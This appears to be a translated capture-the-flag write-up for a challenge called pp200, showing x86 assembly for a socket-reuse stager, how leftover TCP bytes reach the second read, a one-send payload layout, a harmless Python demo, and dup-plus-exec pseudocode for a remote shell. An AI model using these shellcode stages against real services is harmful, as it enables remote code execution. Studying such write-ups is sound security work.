From: syc
Using socket reuse to solve pp200
This method is a bit bloated, though ~
It is also more or less the method people outside China use.
There are still better methods, discussed further down.
This is the method I and a few others used.
00000000 89EE        mov esi, ebp           ; get new buffer address
00000002 68FF000000  push dword 0xff        ; len
00000007 56          push esi               ; buffer address
00000008 FF7508      push dword [ebp + 0x8] ; socket fd
0000000B BB04110508  mov ebx, 0x8051104     ; ebx = readAll() address
00000010 FFD3        call ebx               ; call readAll() -> recv()
00000012 FFD6        call esi               ; call shellcode in the buffer
[ebp + 0x8] is the socket fd the program has already bind()ed.
So you only need to grab it and use it again.
The program calls readAll(fd, buffer, 73) once.
The buffer that gives you is very narrow; the bind() shellcode won't fit.
So I use a small first-stage shellcode that calls readAll(fd, buffer, 255) again.
This tears the entry point open wider and lets it receive 255 bytes.
At first my python script called send() twice:
the first send() carried my socket reuse shellcode,
the second send() my bind() shellcode.
But the bind() shellcode never seemed to get called after the send().
Debugging with gdb, I found that after the second readAll(fd, buffer, 255) call,
what runs is the part of the socket reuse shellcode beyond the first 73 bytes: 0x42 0x42 0x42 0x0A = ~
Then I roughly understood: the shellcode had in fact been delivered all at once.
recv() only took 73 bytes;
everything beyond 73 bytes stayed queued in the TCP stack's buffer.
I also asked xi4oyu to confirm this.
When I call readAll(fd, buffer, 255) the second time,
recv() simply pulls data straight out of the TCP stack's buffer,
not the second batch of data I send() from python.
So you only need a single python send().
The format of that send() is:
socket reuse shellcode + nops (more than 73 bytes in total) + nops + bind() shellcode
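Why the second readAll() received the tail of the first send() rather than the second one, shown as an added Python demonstration (not part of syc's post): a stream socket has no message boundaries, so recv(73) leaves everything after byte 73 queued in the kernel and the next recv() continues from there. socketpair() stands in for the real TCP connection and the marker bytes are constructed.

```python
import socket

FIRST_READ = 73     # the program's first readAll(fd, buffer, 73)
SECOND_READ = 255   # the second readAll(fd, buffer, 255) issued by stage one


def two_reads(messages):
    """Deliver each message with its own send(), then perform the two recv()
    calls the target makes. Returns (first_chunk, second_chunk).

    socketpair() is constructed here in place of the TCP connection; byte
    ordering and kernel-side queueing behave the same for any stream socket.
    """
    client, server = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)
    try:
        for m in messages:
            client.sendall(m)
        client.shutdown(socket.SHUT_WR)    # sender is done, so recv() never blocks
        first = server.recv(FIRST_READ)    # takes 73 bytes; the rest stays queued
        second = server.recv(SECOND_READ)  # continues from byte 73 of the stream
        return first, second
    finally:
        client.close()
        server.close()


# Constructed marker data, no real code: 'S' = stage-one bytes, 'N' = padding,
# 'B' = the second stage that is supposed to land in the 255-byte read.
FIRST_MSG = b"S" * 60 + b"N" * 20   # 80 bytes, longer than the 73 the first recv() consumes
SECOND_MSG = b"B" * 40
TAIL = FIRST_MSG[FIRST_READ:]       # the 7 bytes the first recv() leaves behind


def two_separate_sends():
    """The author's first attempt: stage one and stage two in separate send() calls."""
    return two_reads([FIRST_MSG, SECOND_MSG])


def one_combined_send():
    """What works: one send() whose bytes beyond 73 are exactly what the second read gets."""
    return two_reads([FIRST_MSG + SECOND_MSG])


if __name__ == "__main__":
    for name, fn in (("separate", two_separate_sends), ("combined", one_combined_send)):
        first, second = fn()
        print(f"{name:9s} first={len(first)}B  second read starts with {second[:7]!r}")
```

In both cases the second read begins with the 7 leftover bytes of the first message, never with the second send(); only the combined layout puts the second stage where that read will find it.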
The effect is as follows:
Another simpler and more lightweight method is the dup + exec trick xi4oyu taught me.
The pseudocode looks like this:
dup(fd, 0)
dup(fd, 1)
exec("/bin/sh")
This redirects both standard input and standard output to the socket fd.
That way, when the shell is started,
it goes from a local bash shell on stdin/stdout to a bash shell that talks back over the network .......
I'm still testing the system call number for dup().
Once the screenshot is ready I'll upload it =. = ~